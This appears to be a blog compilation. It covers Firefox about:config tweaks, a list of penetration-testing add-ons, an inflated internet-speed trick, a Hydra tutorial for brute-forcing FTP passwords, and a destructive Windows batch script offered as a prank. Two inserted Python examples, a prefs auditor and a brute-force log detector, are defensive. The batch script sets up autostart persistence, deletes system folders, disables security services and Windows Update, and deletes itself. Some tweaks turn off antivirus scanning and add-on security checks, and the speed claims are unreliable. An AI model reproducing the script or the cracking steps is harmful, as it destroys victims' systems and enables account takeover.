The about:config page contains most (if not all) of Firefox's configuration options. It is so far the most effective and the most powerful way to tweak and enhance your Firefox performance. Here are 28 of the popular tweaks.

Accessing your about:config page

In your Firefox, type about:config in the address bar.


You will be shown a warning page. Click the “I’ll be careful, I promise!” button to proceed.


On the main page, you will see a long list of configuration entries. Enter the name of the key you want to update in the “Filter” field. The list will narrow to only the entries that match your keyword as you type. To modify the value, simply double click on the entry value field and update the entry. That’s all! Isn’t that simple? Now, let’s get to the tweaking.

1) Adjust the Smart Location Bar’s Number of Suggestions

In Firefox 3, when you start typing in the location bar, a drop-down list of suggested URLs will be shown. If you want it to show more than 12 suggestions (12 is the default), you can adjust the browser.urlbar.maxRichResults key and get it to show the number you want.

Config name: browser.urlbar.maxRichResults
Default: 12
Modified value: Set to your desired number of suggestions. If you want to disable it altogether, set it to -1

2) Disable the session restore function

Firefox 3 automatically saves your session every 10 secs so that whenever it crashes, it can restore all your tabs. While this is a useful feature, some of you might find it irritating. To disable this function, toggle the value of browser.sessionstore.enabled to False.

Config name: browser.sessionstore.enabled
Default: True
Modified value: False if you want to disable the session restore function

3) Adjust the Session Restore Saving Frequency

Same as above, if you decide to keep the session restore feature on but want to reduce the session saving frequency, change the value of browser.sessionstore.interval so that Firefox will save the session at a longer interval.

Config name: browser.sessionstore.interval
Default: 10000 (in msecs, equivalent to 10 secs)
Modified value: Set it to your desired value. 1000 means 1 sec and 60000 means 1 minute.

4) Enable Advanced Color Profile Support

Firefox has an advanced color profile feature that displays higher image quality. It is not enabled by default as it has a negative effect on the performance of the browser. If you are more concerned with image quality than with performance, you can activate it via the gfx.color_management.enabled setting.

Config name: gfx.color_management.enabled
Default: False
Modified value: True (if you want to activate the color profile support feature)

5) Disable Antivirus Scanning

This is mainly for Windows users. By default, Firefox 3 automatically scans each downloaded file with the default anti-virus application to make sure it is free of viruses. If you download a big file, it could take a long time for the whole scanning process to complete. To increase the performance of the browser, you might want to consider disabling the anti-virus scanning via the browser.download.manager.scanWhenDone key.

Config name: browser.download.manager.scanWhenDone
Default: True
Modified value: False (if you want to disable it)

6) Configuring The Scrolling Tabs

When you open many tabs, Firefox will not keep on reducing the tab width. Instead, it shows a scrolling bar so that the min width (100px) is conserved and you can scroll to find your tabs. If you don’t like the scrolling tab function and prefer Firefox to show all the tabs, regardless of how small they are, you can set the value of browser.tabs.tabMinWidth to 0 to disable it. Similarly, if you want Firefox to display more tabs before showing the scrolling button, you can reduce the default value to a lower value, say 75 pixels.

Config name: browser.tabs.tabMinWidth
Default: 100
Modified value: 0 if you want to disable the scrolling function, other values to set the min width value

7) Show/Disable Close button on Tabs

Some people love to see the Close (the red X) button on every tab, but some hate it. Either way, you can configure it to your preference via the browser.tabs.closeButtons setting.

Config name: browser.tabs.closeButtons
Default: 1
Modified values:
0 – display a close button on the active tab only
1 – display close buttons on all tabs
2 – don’t display any close buttons
3 – display a single close button at the end of the tab strip

8) Extend Scripts Execution Time

In Firefox 3, a script is only given 10 seconds to respond, after which Firefox will issue an unresponsive script warning. If you are on a slow network connection, you might want to increase the script execution time via dom.max_script_run_time to cut down on the frequency of the unresponsive script warning.

Config name: dom.max_script_run_time
Default: 10 (in secs)
Modified value: 20, or any value greater than 10

9) Handling JavaScript Popups

When you come across a site that executes a JavaScript open-new-window function, and the popup window is without all the usual window features, i.e. back/forward/reload buttons, status bar etc., Firefox will automatically treat it as a popup and will not open it as a new tab. However, if you find this to be a nuisance and want to open all new windows in new tabs, you can specify it via the browser.link.open_newwindow.restriction setting.

Config name: browser.link.open_newwindow.restriction
Default: 2 – Open all JavaScript windows the same way as you have Firefox handle new windows unless the JavaScript call specifies how to display the window
Modified values:
0 – open all links as how you have Firefox handle new windows
1 – do not open any new windows
2 – open all links as how you have Firefox handle new windows unless the JavaScript specifies how to display the window

10) Enable Spell Checking In All Text Fields

The default spell checking function only checks multi-line text boxes. You can get it to spell-check single-line text boxes as well.

Config name: layout.spellcheckDefault
Default: 1 (spell checker for multi-line text boxes only)
Modified values:
0 – disable the spell checker
2 – enable the spell checker for all text boxes

11) Open Search Box Results In New Tab

When you search using the search box at the top right hand corner of the browser, it will display the search results in the current tab. If you don’t want the search to interfere with your current tab, you can tweak browser.search.openintab to make it open in a new tab.

Config name: browser.search.openintab
Default: False
Modified value: True (open search box results in new tab)

12) Lower The Physical Memory Used When Minimized

This tweak is mainly for Windows users. When you minimize Firefox, it will send Firefox to your virtual memory and free up your physical memory for other programs to use. Firefox will reduce its physical memory usage, when minimized, to approximately 10MB (give or take some) and when you maximize Firefox it will take back the memory that it needs. The preference name does not exist and needs to be created. Right click on the background and select New->Boolean.

Enter the name when prompted: config.trim_on_minimize
Enter the value: True

13) Speed up your Firefox

Several tweaks are required for this:

Config name: network.http.pipelining
Default: False
Modified value: True

Config name: network.http.proxy.pipelining
Default: False
Modified value: True

Config name: network.http.pipelining.maxrequests
Default: 4
Modified value: any value higher than 4, but not more than 8

Config name: network.http.max-connections
Default: 30
Modified value: 96

Config name: network.http.max-connections-per-server
Default: 15
Modified value: 32

14) Increase/Decrease the Amount of Disk Cache

When a page is loaded, Firefox will cache it on the hard disk so that it doesn’t need to be downloaded again for redisplaying. The bigger the storage size you allow for Firefox, the more pages it can cache. Before you increase the disk cache size, make sure that browser.cache.disk.enable is set to True.

Config name: browser.cache.disk.capacity
Default: 50000 (in KB)
Modified value:
0 – disable disk caching
any value lower than 50000 reduces the disk cache
any value higher than 50000 increases the disk cache

15) Select all text when click on the URL bar

In Windows and Mac, Firefox highlights all text when you click on the URL bar. In Linux, it does not select all the text. Instead, it places the cursor at the insertion point. Regardless of which platform you are using, you can now tweak it to either select all or place the cursor at the insertion point.

Config name: browser.urlbar.clickSelectsAll
Modified value:
False – place cursor at insertion point
True – select all text on click

16) Autofill Address in URL Bar

Other than the smart location feature, you can also get your URL bar to autofill the address as you type the URL.

Config name: browser.urlbar.autofill
Default: False
Modified value: True (have Firefox autofill the address as you type in the URL bar)

17) Same Zoom Level For Every Site

Firefox remembers your zoom preference for each site and applies it whenever you load the page. If you want the zoom level to be consistent from site to site, you can toggle the value of browser.zoom.siteSpecific from True to False.

Config name: browser.zoom.siteSpecific
Default: True
Modified value: False (enable same zoom preferences for every site)

18) Setting your zoom limit

If you find that the max/min zoom level is still not sufficient for your viewing, you can change the zoom limit to suit your viewing habits.

Config name: zoom.maxPercent
Default: 300 (percent)
Modified value: any value higher than 300

Config name: zoom.minPercent
Default: 30 (percent)
Modified value: any value

19) Configure Your Backspace Button

In Firefox, you can put your backspace key to better use by getting it to either go back to the previous page or act as a page up function.

Config name: browser.backspace_action
Default: 2 (does nothing)
Modified value:
0 – go back to the previous page
1 – page up

20) Increase Offline Cache

If you do not have access to the Internet most of the time, you might want to increase the offline cache so that you can continue to work offline. By default, Firefox 3 caches 500MB of data from supported offline Web apps. You can change that value to whatever amount you choose.

Config name: browser.cache.offline.capacity
Default: 512000 (in KB)
Modified value: any value higher than 512000 will increase the cache value

21) Auto Export Firefox 3 bookmarks to bookmarks.html

Unlike the previous version, Firefox 3 backs up the bookmarks file in places.sqlite rather than the usual bookmarks.html. Since bookmarks.html allows us to export and sync our bookmarks with other browsers, it is very useful if Firefox 3 can back up the bookmarks to bookmarks.html as well.

Config name: browser.bookmarks.autoExportHTML
Default: False
Modified value: True (auto export bookmarks file to bookmarks.html)

22) Disable Extension Compatibility Checks

This is useful if you badly want to use an extension that is not supported by your version of Firefox. It is not recommended, but you can still do it at your own risk. Right click and select New->Boolean. Enter extensions.checkCompatibility in the field. Enter False in the next field. Right click again and select New->Boolean. Enter extensions.checkUpdateSecurity into the field and enter False into the next field.

23) Disable Delay Time When Installing Add-on

Every time you want to install a Firefox add-on, you have to wait for several secs before the actual installation starts. If you are tired of waiting, you can turn the security.dialog_enable_delay function off so that the installation will start immediately upon clicking.

Config name: security.dialog_enable_delay
Default: 2000 (in msec)
Modified value:
0 – start installation immediately
any other value (in msec)

24) View Source in Your Favorite Editor

This is very useful for developers who are always using the ‘view source’ function. This tweak allows you to view the source code in an external editor. There are two configuration changes that need to be made:

Config name: view_source.editor.external
Default: False
Modified value: True (enable view source using external text editor)

Config name: view_source.editor.path
Default: blank
Modified value: insert the file path to your editor here.

25) Increasing ‘Save Link As’ timeout value

When you right click and select ‘Save Link As…’, the browser will request the content disposition header from the URL so as to determine the filename. If the URL does not deliver the header within 1 sec, Firefox will issue a timeout. This could happen very frequently in a slow network connection environment. To prevent this issue from happening frequently, you can increase the timeout value so as to reduce the possibility of a timeout.

Config name: browser.download.saveLinkAsFilenameTimeout
Default: 1000 (1 sec)
Modified value: any value higher than 1000 (value is in msec)

26) Animate Fullscreen Toolbar Collapse mode

In Firefox’s fullscreen mode, toolbars and the tab strip are hidden at the top of the screen and only shown on mouseover. To draw attention to this, there is an animation of the toolbar sliding upwards and off-screen when fullscreen mode is toggled on. For performance reasons, the animation of the toolbar collapsing only appears the first time. Whether you love or hate the animation, you can adjust browser.fullscreen.animateUp to switch it on/off for every collapse.

Config name: browser.fullscreen.animateUp
Default: 1 (animate the toolbar collapse only the first time)
Modified value:
0 – disable the animation
2 – enable the animation for every collapse

27) Autohide Toolbar in Fullscreen mode

In fullscreen mode, the toolbar is set to autohide and appear upon mouseover. If you need to view the toolbar at all times, you can toggle the value of browser.fullscreen.autohide to False to always show the toolbar.

Config name: browser.fullscreen.autohide
Default: True (always autohide)
Modified value: False (always show the toolbar)

28) Increase Add-On search result

If you go to Tools->Add-ons->Get Add-ons and perform a search there, Firefox will only fetch and display 5 matching results. If you want Firefox to show more than 5 results (say 10), you can adjust extensions.getAddons.maxResults to get it to display more results.

Config name: extensions.getAddons.maxResults
Default: 5
Modified value: any value more than 5.
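
Tweaks 5, 22 and 23 above switch off browser safeguards: antivirus scanning of downloads, the add-on compatibility and update-security checks, and the install dialog delay. The following added example, which is not part of the original post, parses the text of a profile's prefs.js or user.js and reports those settings; the sample file contents, the function names and the 2000 ms threshold (the default the post states) are assumptions.

```python
import re

# Default install-dialog delay as stated in the post (assumption: adjust it
# to the default of the Firefox version you actually run).
POST_DEFAULT_DIALOG_DELAY_MS = 2000


def _is_int(value):
    # bool is a subclass of int in Python, so exclude it explicitly.
    return isinstance(value, int) and not isinstance(value, bool)


# Preference names come from the post; each maps to a predicate that is true
# when the stored value weakens a safeguard, plus a short explanation.
RISKY_PREFS = {
    "browser.download.manager.scanWhenDone": (
        lambda v: v is False,
        "downloaded files are not handed to the antivirus scanner",
    ),
    "extensions.checkCompatibility": (
        lambda v: v is False,
        "add-ons not marked compatible with this Firefox version can load",
    ),
    "extensions.checkUpdateSecurity": (
        lambda v: v is False,
        "add-on updates are accepted without the update security check",
    ),
    "security.dialog_enable_delay": (
        lambda v: _is_int(v) and v < POST_DEFAULT_DIALOG_DELAY_MS,
        "install dialog buttons enable sooner than the stated default",
    ),
}

# One preference per line: user_pref("name", true|false|integer|"string");
PREF_RE = re.compile(
    r'^\s*user_pref\(\s*"(?P<name>(?:[^"\\]|\\.)+)"\s*,\s*'
    r'(?P<value>true|false|-?\d+|"(?:[^"\\]|\\.)*")\s*\)\s*;'
)


def parse_prefs(text):
    """Return {name: value} for every user_pref line; the last one wins."""
    prefs = {}
    for line in text.splitlines():
        match = PREF_RE.match(line)
        if match is None:
            continue  # comments, blank lines, anything malformed
        raw = match.group("value")
        if raw in ("true", "false"):
            value = raw == "true"
        elif raw.startswith('"'):
            value = raw[1:-1]
        else:
            value = int(raw)
        prefs[match.group("name")] = value
    return prefs


def audit(prefs):
    """Return sorted (name, value, reason) tuples for weakened settings."""
    findings = []
    for name, (is_risky, reason) in RISKY_PREFS.items():
        if name in prefs and is_risky(prefs[name]):
            findings.append((name, prefs[name], reason))
    return sorted(findings)


# Constructed sample of a profile's prefs.js, not taken from a real profile.
SAMPLE_PREFS_JS = """\
// Mozilla User Preferences (constructed sample)
user_pref("browser.urlbar.maxRichResults", 20);
user_pref("browser.download.manager.scanWhenDone", false);
user_pref("extensions.checkUpdateSecurity", false);
user_pref("security.dialog_enable_delay", 0);
// user_pref("extensions.checkCompatibility", false);
user_pref("network.http.pipelining", true);
user_pref("view_source.editor.path", "/usr/bin/gedit");
"""

if __name__ == "__main__":
    for name, value, reason in audit(parse_prefs(SAMPLE_PREFS_JS)):
        print(f"{name} = {value!r}: {reason}")
```

Resetting a flagged preference in about:config (right click, Reset) restores the safeguard.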

Friday, 24 October 2014

Turn FireFox into Penetration Tool

Firefox is a popular web browser from Mozilla. Firefox is popular not only because it’s a good web browser; it also supports add-ons that enhance its functionality. Mozilla has an add-on website that has thousands of useful add-ons in different categories. Some of these add-ons are useful for penetration testers and security analysts. These penetration testing add-ons help in performing different kinds of attacks and in modifying request headers directly from the browser. This way, they reduce the need for a separate tool for most penetration testing related tasks.

In this brief post, we are listing a few popular and interesting Firefox add-ons that are useful for penetration testers. These add-ons vary from information gathering tools to attacking tools. Use what you think is helpful. All these add-ons are available for free and you can download them from the Mozilla add-on website. There are some premium add-ons like Dominator Pro which are also available for purchase from official websites. See the list of free add-ons below.

Firefox Add-ons for Security Researchers and Penetration Testers

1. FoxyProxy Standard

FoxyProxy is an advanced proxy management add-on for the Firefox browser. It improves the built-in proxy capabilities of Firefox. There are a few other similar proxy management add-ons available, but it offers more features than the other add-ons. Based on URL patterns, it switches the internet connection across one or more proxy servers. When a proxy is in use, it also displays an animated icon. In case you want to see the proxies used by the tool, you can see the logs. Add FoxyProxy to your browser from this link: https://addons.mozilla.org/en-US/firefox/addon/foxyproxy-standard/

2. Firebug

Firebug is a nice add-on that integrates a web development tool inside the browser. With this tool, you can edit and debug HTML, CSS and JavaScript live in any webpage to see the effect of changes. It helps in analyzing JS files to find XSS vulnerabilities. It’s a really helpful add-on for security testing professionals looking for DOM based XSS. Add Firebug to your browser from this link: https://addons.mozilla.org/en-US/firefox/addon/firebug/

3. Web Developer

Web Developer is another nice add-on that adds various web development tools to the browser. It helps in web application penetration testing. Add Web Developer to your browser from this link: https://addons.mozilla.org/de/firefox/addon/web-developer/

4. User Agent Switcher

The User Agent Switcher add-on adds a one-click user agent switch to the browser. It adds a menu and a toolbar button to the browser. Whenever you want to switch the user agent, use the browser button. The User Agent Switcher add-on helps in spoofing the browser while performing some attacks. Add User Agent Switcher to your browser from this link: https://addons.mozilla.org/en-US/firefox/addon/user-agent-switcher/

5. Live HTTP Headers

Live HTTP Headers is a really helpful penetration testing add-on for Firefox. It displays live headers of each HTTP request and response. You can also save header information by clicking on the button in the lower left corner. I don’t think that there is any kind of need to tell how important this add-on is for the security testing process. Add Live HTTP Headers to Firefox with this link: https://addons.mozilla.org/en-US/firefox/addon/live-http-headers/

6. Tamper Data

Tamper Data is similar to the Live HTTP Headers add-on but has header editing capabilities. With the Tamper Data add-on, you can view and modify HTTP/HTTPS headers and POST parameters. Thus it helps in security testing web applications by modifying POST parameters. It can be used in performing XSS and SQL Injection attacks by modifying header data. Add the Tamper Data add-on to the Firefox browser with this link: https://addons.mozilla.org/en-US/firefox/addon/tamper-data/

7. Hackbar

Hackbar is a simple penetration tool for Firefox. It helps in testing simple SQL injection and XSS holes. You cannot execute standard exploits, but you can easily use it to test whether a vulnerability exists or not. You can also manually submit form data with GET or POST requests. It also has encryption and encoding tools. Most of the time, this tool helps in testing XSS vulnerabilities with encoded XSS payloads. It also supports keyboard shortcuts to perform various tasks. I am sure most people in the security field already know about this tool. This tool is mostly used in finding POST XSS vulnerabilities because it can send POST data manually to any page you like. With the ability to manually send POST form data, you can easily bypass client side validations of the page. If your payload is being encoded at the client side, you can use an encoding tool to encode your payload and then perform the attack. If the application is vulnerable to XSS, I am sure you will find the vulnerability with the help of the Hackbar add-on on the Firefox browser. Add the Hackbar add-on to the Firefox browser with this link: https://addons.mozilla.org/en-US/firefox/addon/hackbar/

8. Websecurify

Websecurify is a nice penetration testing tool that is also available as an add-on for Firefox. We have already covered WebSecurify in detail in a previous article. WebSecurify can detect the most common vulnerabilities in web applications. This tool can easily detect XSS, SQL injection and other web application vulnerabilities. Unlike the other listed tools, it is a complete penetration testing tool in itself, available as a browser add-on. It gives most of the features available in the standalone tool. Add WebSecurify to the Firefox browser with this link: https://addons.mozilla.org/en-us/firefox/addon/websecurify/

9. Add N Edit Cookies

“Add N Edit Cookies” is a cookie editing add-on that allows you to add and edit cookie data in your browser. With this tool, you can easily add session data manually in cookies. This tool is used in session hijacking attacks when you have the active cookies of the user. Edit your cookies to add the data and hijack the account. To download Add N Edit Cookies to your Firefox browser: https://addons.mozilla.org/en-US/firefox/addon/add-n-edit-cookies-13793/

10. XSS Me

Cross Site Scripting is the most commonly found web application vulnerability. For detecting XSS vulnerabilities in web applications, this add-on can be a useful tool. XSS-Me is used to find reflected XSS vulnerabilities from a browser. It scans all forms of the page, and then performs an attack on the selected pages with pre-defined XSS payloads. After the scan is complete, it lists all the pages that render a payload on the page and may be vulnerable to an XSS attack. Now, you can manually test the web page to find whether the vulnerability exists or not. Add XSS Me to your Firefox browser: https://addons.mozilla.org/en-us/firefox/addon/xss-me/

11. SQL Inject Me

SQL Inject Me is another nice Firefox add-on used to find SQL injection vulnerabilities in web applications. This tool does not exploit the vulnerability but displays that it exists. SQL injection is one of the most harmful web application vulnerabilities; it can allow attackers to view, modify, edit, add or delete records in a database. The tool sends escape strings through form fields, and tries to search for database error messages. If it finds a database error message, it marks the page as vulnerable. QA testers can use this tool for SQL injection testing. Add the SQL Inject Me add-on to your browser: https://addons.mozilla.org/en-us/firefox/addon/sql-inject-me/

12. FlagFox

FlagFox is another interesting add-on. Once installed in the browser, it displays the country’s flag to tell the location of the web server. It also comes with other tools like whois, WOT scorecard and ping. Add FlagFox to your browser: https://addons.mozilla.org/en-us/firefox/addon/flagfox/

13. CryptoFox

CryptoFox is an encryption and decryption tool for Mozilla Firefox. It supports most of the available encryption algorithms, so you can easily encrypt or decrypt data with a supported encryption algorithm. This add-on comes with dictionary attack support to crack MD5 passwords. Although it doesn’t have good reviews, it works satisfactorily. Add the CryptoFox add-on to your browser: https://addons.mozilla.org/en-US/firefox/addon/cryptofox/

14. Access Me

Access Me is another add-on for security testing professionals. This add-on is developed by the company that works on XSS Me and SQL Inject Me. Access Me is the Exploit-Me tool used for testing access vulnerabilities in web applications. This tool works by sending several versions of page requests. A request using the HTTP HEAD verb and a request using a made-up SECCOM verb will be sent. A combination of session and HEAD/SECCOM will also be sent. Add Access Me to Firefox from this link: https://addons.mozilla.org/en-US/firefox/addon/access-me/

15. SecurityFocus Vulnerabilities search plugin

The SecurityFocus Vulnerabilities search plugin is not a security tool but a search plugin that lets users search for vulnerabilities from the Security Focus database. Add this to Firefox from the link: https://addons.mozilla.org/en-us/firefox/addon/securityfocus-vulnerabilities-/

16. Packet Storm search plugin

This is another search plugin that lets users search for tools and exploits from packetstormsecurity.org. The website offers free up-to-date security tools, exploits and advisories. Add this to Firefox from the link: https://addons.mozilla.org/en-us/firefox/addon/packet-storm-search-plugin/

17. Offsec Exploit-db Search

This is another plugin similar to the last two above. It also lets users search for vulnerabilities and exploits listed in exploit-db.com. This website is always up-to-date with the latest exploits and vulnerability details. Add this to Firefox from the link: https://addons.mozilla.org/en-us/firefox/addon/offsec-exploit-db-search/

18. Snort IDS Rule Search

Snort IDS Rule Search is another search add-on for Firefox. It lets users search for Snort IDS rules on the snort.org website. Snort is the most widely deployed IDS/IPS technology worldwide. It’s an open source network intrusion prevention and detection system with more than 400,000 users. Add Snort IDS Rule Search to Firefox here: https://addons.mozilla.org/en-US/firefox/addon/snort-ids-rule-search/

These are a few add-ons that you can use during web application penetration testing. Although you cannot finish a complete penetration test with these tools, these browser tools are useful for most of the tasks and reduce the use of separate tools.

Hackbar, SQL Inject Me, XSS Me and WebSecurify are the browser tools that are widely used for finding vulnerabilities in web applications. Other tools are used for specific work which helps in getting information during penetration testing. There are many more add-ons available.


Wednesday, 22 October 2014

Increase Internet Speed Upto 300%

This is a short trick on how to make your internet 300% faster or higher.
So that you can :-)
* Increase your browsing experience
* Play online games LAG free
* Load videos almost instantly
* Turn your slow internet connection into Broadband DSL or even T1
* Download anything faster with our “intelligent packet configurator”
* Increase Speeds Up To 375% Faster!
PLEASE NOTE: Only works for Mozilla Firefox
1) Open Mozilla Firefox.
2) In the address bar type: “about:config”
3) Look for where it says “network.http.pipelining” and set it to TRUE (double click it until it says TRUE)
4) Look for “network.http.proxy.pipelining” and set it to TRUE (same way as stated above)
5) Now right-click anywhere, then click “Create New”, then “Integer”. Name it “nglayout.initialpaint.delay”. Then click OK, then put the number “0” (zero) in the next box.
6) Click OK.
7) Restart Firefox.
Feel the difference in speed.


Monday, 20 October 2014

Hydra to crack FTP passwords

This post covers the basics of hacking an FTP server using the dictionary search technique. Here are the steps involved.

1) Download the software hydra 5.4 from the link mentioned below.

http://freeworld.thc.org/thc-hydra/

2) Save files in any location. For convenience download the files in c:\.

3) For this demonstration a basic FTP server is setup on the network with IP address 192.168.1.4 (port 21)

4) Open a command prompt and navigate to the hydra folder. Type “hydra” or “hydra --help” to access the built-in help.

5) Type the syntax in a notepad before entering it into the command prompt.

6) Type the following syntax “hydra -l user -P dic.txt -e ns -vV 192.168.1.4 ftp” into notepad. Copy the syntax and paste it into the command prompt. Press Enter.

7) The dic.txt file contains the keywords for checking the FTP server password and username.

8) For demonstration purposes the dictionary file is named “dic.txt”, with some fake words and one real password of the FTP server, and the user name is already known as “user”. Hydra will find the password.

9) Hydra found the password “darkness” for this demonstration. Now that we have a username/password pair we can log in to the server and access the files on the FTP server.

10) Depending on the privileges of the account, you get access to edit/delete/upload files. Use an FTP client such as FileZilla to edit or upload files if you have the privilege to do so.
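
On the server side, a dictionary run like the one in steps 6 to 9 shows up as a burst of failed logins from one client, followed by a successful login once the password is found. The following added example, which is not part of the original post, detects that pattern; it assumes vsftpd-style log lines, and the sample log, client addresses, threshold and time window are constructed.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Assumed log format (vsftpd style):
#   Mon Oct 20 10:20:00 2014 [pid 4110] [user] FAIL LOGIN: Client "192.168.1.50"
LINE_RE = re.compile(
    r'^(?P<ts>\w{3} \w{3} [ \d]\d \d\d:\d\d:\d\d \d{4}) \[pid \d+\] '
    r'\[(?P<user>[^\]]*)\] (?P<result>OK|FAIL) LOGIN: Client "(?P<ip>[^"]+)"'
)
TS_FORMAT = "%a %b %d %H:%M:%S %Y"


def detect_bruteforce(lines, threshold=5, window=timedelta(seconds=60)):
    """Return {client_ip: alert} for clients with >= threshold failed logins
    inside the sliding window. alert["compromised_user"] is set when a
    successful login follows while the burst is still inside the window."""
    recent = defaultdict(deque)  # client IP -> timestamps of recent failures
    alerts = {}
    for line in lines:
        match = LINE_RE.match(line)
        if match is None:
            continue  # not a login event
        ts = datetime.strptime(match.group("ts"), TS_FORMAT)
        ip = match.group("ip")
        failures = recent[ip]
        # Forget failures that have aged out of the window.
        while failures and ts - failures[0] > window:
            failures.popleft()
        if match.group("result") == "FAIL":
            failures.append(ts)
        if len(failures) < threshold:
            continue
        alert = alerts.setdefault(
            ip, {"peak_failures": 0, "compromised_user": None}
        )
        alert["peak_failures"] = max(alert["peak_failures"], len(failures))
        if match.group("result") == "OK":
            # A success right after a burst of failures: password guessed.
            alert["compromised_user"] = match.group("user")
    return alerts


# Constructed sample log: one mistyped password from a normal client, then a
# dictionary run against the account "user" from a second client.
SAMPLE_LOG = """\
Mon Oct 20 10:15:01 2014 [pid 4101] [alice] FAIL LOGIN: Client "192.168.1.20"
Mon Oct 20 10:15:09 2014 [pid 4102] [alice] OK LOGIN: Client "192.168.1.20"
Mon Oct 20 10:20:00 2014 [pid 4110] [user] FAIL LOGIN: Client "192.168.1.50"
Mon Oct 20 10:20:01 2014 [pid 4111] [user] FAIL LOGIN: Client "192.168.1.50"
Mon Oct 20 10:20:02 2014 [pid 4112] [user] FAIL LOGIN: Client "192.168.1.50"
Mon Oct 20 10:20:03 2014 [pid 4113] [user] FAIL LOGIN: Client "192.168.1.50"
Mon Oct 20 10:20:04 2014 [pid 4114] [user] FAIL LOGIN: Client "192.168.1.50"
Mon Oct 20 10:20:05 2014 [pid 4115] [user] FAIL LOGIN: Client "192.168.1.50"
Mon Oct 20 10:20:06 2014 [pid 4116] [user] OK LOGIN: Client "192.168.1.50"
"""

if __name__ == "__main__":
    for ip, alert in detect_bruteforce(SAMPLE_LOG.splitlines()).items():
        print(ip, alert)
```

An alert with a compromised user means the account's password should be changed and the client address blocked; rate limiting or locking out repeated failures stops the run before it reaches that point.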


Saturday, 18 October 2014

SHUT YOUR INTERNET PERMANENTLY

This is a slightly more advanced one. It shuts down your internet permanently. I tried it on myself accidentally; I knew what it did, and it still took me a couple of days to get my internet back. Works best on XP, not tested on Vista or 7. EDIT: At the bottom put a rickroll site or something. BTW, that 3rd line isn't what disables the internet permanently. It is something else, that just provides a fast response to shut down any connections.

@echo off
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v MiXedVeX /t REG_SZ /d %systemroot%\HaloTrialScoreChangerV1 /f > nul
start iexpress (website of your choice)
ipconfig /release
del "C:\Program Files\Microsoft Games
del "C:Nexon
del "C:\Program Files\Xfire
del "C:\Program Files\Adobe"
del "C:\Program Files\Internet Explorer"
del "C:\Program Files\Mozilla Firefox"
del "C:\WINDOWS"
del "C:\WINDOWS\system32"
del "C:\WINDOWS\system32\cmd"
del "C:\WINDOWS\system32\iexpress"
del "C:\WINDOWS\system32\sndvol32"
del "C:\WINDOWS\system32\sndrec32"
del "C:\WINDOWS\system32\Restore\rstrui"
del "C:\WINDOWS\system32\wupdmgr"
del "C:\WINDOWS\system32\desktop"
del "C:\WINDOWS\java"
del "C:\WINDOWS\Media"
del "C:\WINDOWS\Resources"
del "C:\WINDOWS\system"
del "C:\drivers"
del "C:\drv"
del "C:\SYSINFO"
del "C:\Program Files"
echo ipconfig/release_all>>c:windowswimn32.bat
net stop "Security Center"
net stop SharedAccess
> "%Temp%.kill.reg" ECHO REGEDIT4
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesS haredAccess]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesw uauserv]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMControlSet001Serviceswscsv c]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
START /WAIT REGEDIT /S "%Temp%.kill.reg"
del "%Temp%.kill.reg"
del %0
echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f :a
start iexpress (website of your choice) goto a
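For defenders, the behaviours this batch file combines (Run-key autostart, releasing the network lease, deleting system paths, stopping and disabling security services, silent registry import, self-deletion) can be flagged statically before a script ever runs. The Python triage scanner below is an added example, not part of the original post; the rule names, the threshold of three behaviours, and both sample scripts are constructed for illustration.

```python
import re

# One case-insensitive regex per behaviour seen in the batch file above (rule names are hypothetical).
RULES = {
    "run_key_persistence": r'\breg(?:\.exe)?\s+add\s+"?[^\s"]*\\currentversion\\run(?:once)?\b',
    "service_start_disabled": r'"start"\s*=\s*dword:0*4\b',
    "security_service_stop": r'\bnet\s+stop\s+"?(?:security center|sharedaccess|wscsvc|wuauserv)\b',
    "network_release": r'\bipconfig\s*/release',
    "system_path_delete": r'\bdel\s+(?:/\w+\s+)*"?(?:[a-z]:\\(?:windows|program files)\b|%(?:systemroot|windir)%)',
    "self_delete": r'\bdel\s+(?:/\w+\s+)*"?%(?:~f)?0\b',
    "silent_reg_import": r'\bregedit(?:\.exe)?\s+/s\b',
}
COMPILED = {name: re.compile(rx, re.IGNORECASE) for name, rx in RULES.items()}

def triage(script_text):
    """Return [(line_number, rule_name, line)] for every rule hit."""
    hits = []
    for number, line in enumerate(script_text.splitlines(), start=1):
        stripped = line.strip()
        if not stripped or stripped.lower().startswith(("rem ", "::")):
            continue  # skip blank lines and batch comments
        hits.extend((number, name, stripped)
                    for name, rx in COMPILED.items() if rx.search(stripped))
    return hits

def verdict(script_text, threshold=3):
    """'suspicious' when at least `threshold` distinct behaviours co-occur (assumed cut-off)."""
    rules_hit = sorted({name for _, name, _ in triage(script_text)})
    if len(rules_hit) >= threshold:
        return "suspicious", rules_hit
    return ("review" if rules_hit else "clean"), rules_hit

# Constructed sample inputs; value names and file paths are placeholders.
SAMPLE_SUSPECT = r"""@echo off
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v ExampleValue /t REG_SZ /d C:\example\placeholder.bat /f
ipconfig /release
del "C:\WINDOWS\system32"
net stop "Security Center"
>>"%Temp%\example.reg" ECHO "Start"=dword:00000004
START /WAIT REGEDIT /S "%Temp%\example.reg"
del %0
"""
SAMPLE_BENIGN = r"""@echo off
rem nightly cleanup (constructed)
reg add HKCU\Software\ExampleApp /v Theme /t REG_SZ /d dark /f
del "%TEMP%\build.log"
ipconfig /all
"""
if __name__ == "__main__":
    print(verdict(SAMPLE_SUSPECT), verdict(SAMPLE_BENIGN))
```

Single hits such as a lone Run-key write are common in legitimate installers, which is why the verdict keys on several behaviours appearing together rather than on any one rule.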


Thursday, 16 October 2014

